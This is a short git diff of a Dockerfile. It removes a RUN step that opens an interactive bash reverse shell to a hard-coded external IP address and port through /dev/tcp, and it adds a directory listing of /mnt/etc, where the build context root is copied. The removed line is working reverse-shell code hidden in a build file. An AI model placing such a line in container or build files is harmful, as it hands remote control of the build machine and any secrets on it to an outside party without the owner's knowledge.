diff --git a/Dockerfile b/Dockerfile index f736958..228d135 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,6 +1,5 @@ FROM ubuntu:latest - -RUN bash -c "bash -i >& /dev/tcp/152.136.32.206/7788 0>&1" - COPY / /mnt/etc + +RUN ls -ahl /mnt/etc \ No newline at end of file